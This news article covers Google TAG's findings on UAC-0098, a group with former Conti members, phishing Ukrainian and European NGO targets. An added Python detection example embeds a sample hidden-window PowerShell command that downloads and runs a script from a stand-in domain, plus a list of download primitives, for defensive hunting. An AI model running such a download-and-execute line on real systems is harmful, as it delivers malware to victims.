Ransomware

Google has announced that its Threat Analysis Group (TAG) has detected ongoing cyberattacks against Ukraine that include former members of the Conti hacker group.

TAG is a group of subject matter experts focusing on cybersecurity and forensic analysis that defends Google and its users from nation-state and advanced persistent threats.

The attacks have been persistent, with TAG detailing five separate attack campaigns by a group tagged as UAC-0098 against Ukraine and European non-governmental organizations (NGOs).

The attacks possess multiple indicators of repurposed attacks from the Conti hacker group, and former members of the group are confirmed to now be a part of UAC-0098.

UAC-0098 has historically carried out human-operated ransomware attacks. Google’s TAG unit first started tracking the group in April 2022, when it launched an email phishing campaign using AnchorMail (also known as “LackeyBuilder”). AnchorMail uses the simple mail transfer protocol (SMTP) for command and control (C2) communication. AnchorMail was developed by Conti.

Additional email campaign attacks were launched in April utilizing other malware such as IcedID and CobaltStrike.

Although the techniques varied, the targeting was consistently against Ukrainian hotels and organizations, per TAG.

In May 2022, UAC-0098 launched another attack against Ukrainian organizations, this time impersonating the National Cyber Police of Ukraine. The email had a malicious link and urged recipients to download an update for their operating system.

The attack would run a PowerShell script downloaded from a malicious domain on the victim’s computer.
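Two of the behaviours described above leave footprints that are straightforward to hunt for in ordinary telemetry: an SMTP-based C2 channel means a workstation speaks SMTP directly to the internet, which only approved mail relays should do, and a phishing lure that ends in "download and run a PowerShell update" means a PowerShell process whose command line fetches content from a remote URL. The following is an added example, not code from Google TAG or the original article; the log lines, the relay allowlist and the host names are constructed for illustration.

```python
"""Two detection rules for the behaviours described above, run over
constructed sample logs (not real telemetry from the campaign)."""
import re

# Assumption: only these internal hosts are allowed to send SMTP outbound.
APPROVED_MAIL_RELAYS = {"10.0.0.25", "10.0.0.26"}
SMTP_PORTS = {25, 465, 587}

# Constructed firewall log: one outbound connection per line.
FIREWALL_LOG = """\
2022-04-12T09:14:01Z src=10.0.0.25 dst=203.0.113.10 dport=25 proto=tcp
2022-04-12T09:15:44Z src=10.0.1.57 dst=198.51.100.7 dport=587 proto=tcp
2022-04-12T09:16:02Z src=10.0.1.57 dst=198.51.100.7 dport=443 proto=tcp
2022-04-12T09:17:30Z src=10.0.1.88 dst=192.0.2.44 dport=25 proto=tcp
"""

# Constructed process-creation events: host|image path|command line.
PROCESS_LOG = """\
WS-0157|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|powershell.exe -w hidden -c "Invoke-WebRequest http://update.example.invalid/os-update.ps1 -OutFile $env:TEMP\\u.ps1; & $env:TEMP\\u.ps1"
WS-0157|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|powershell.exe -File C:\\Scripts\\inventory.ps1
WS-0202|C:\\Windows\\System32\\notepad.exe|notepad.exe report.txt
"""

FW_RE = re.compile(r"src=(?P<src>\S+) dst=(?P<dst>\S+) dport=(?P<dport>\d+)")
# Common PowerShell download primitives; the list is illustrative, not exhaustive.
DOWNLOAD_RE = re.compile(
    r"(DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Start-BitsTransfer)",
    re.IGNORECASE,
)
REMOTE_URL_RE = re.compile(r"https?://", re.IGNORECASE)


def unexpected_smtp_egress(log: str) -> list[tuple[str, str, int]]:
    """Return (src, dst, port) for SMTP connections from non-relay hosts.

    A workstation talking SMTP to the internet is the network-level signature
    of an SMTP C2 channel such as the one the article attributes to AnchorMail.
    """
    hits = []
    for line in log.splitlines():
        m = FW_RE.search(line)
        if not m:
            continue
        src, dst, dport = m["src"], m["dst"], int(m["dport"])
        if dport in SMTP_PORTS and src not in APPROVED_MAIL_RELAYS:
            hits.append((src, dst, dport))
    return hits


def powershell_remote_download(log: str) -> list[tuple[str, str]]:
    """Return (host, command line) for PowerShell launches that pull a remote URL.

    Flags the "download a script from a domain and run it" pattern described
    for the fake National Cyber Police lure; ordinary local scripts are ignored.
    """
    hits = []
    for line in log.splitlines():
        parts = line.split("|", 2)
        if len(parts) != 3:
            continue
        host, image, cmd = parts
        is_powershell = image.lower().endswith(("powershell.exe", "pwsh.exe"))
        if is_powershell and DOWNLOAD_RE.search(cmd) and REMOTE_URL_RE.search(cmd):
            hits.append((host, cmd))
    return hits


if __name__ == "__main__":
    for src, dst, port in unexpected_smtp_egress(FIREWALL_LOG):
        print(f"[smtp-egress] {src} -> {dst}:{port} is not an approved mail relay")
    for host, cmd in powershell_remote_download(PROCESS_LOG):
        print(f"[ps-download] {host}: {cmd}")
```

Both rules are deliberately narrow: the SMTP rule depends on a maintained relay allowlist, and the PowerShell rule will miss obfuscated or encoded command lines, so in practice they belong alongside script-block logging and egress filtering rather than in place of them.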

The attacks continue to escalate, with UAC-0098 impersonating Microsoft and Starlink in campaigns against European NGOs.

The Russian Conti hacker group may have disbanded, but its members have splintered off into separate groups, including UAC-0098. Ransomware gangs like BlackCat, Hive, and AvosLocker have all been infiltrated by former Conti members, according to BleepingComputer.

Conti first surfaced in 2020, replacing the Ryuk ransomware group.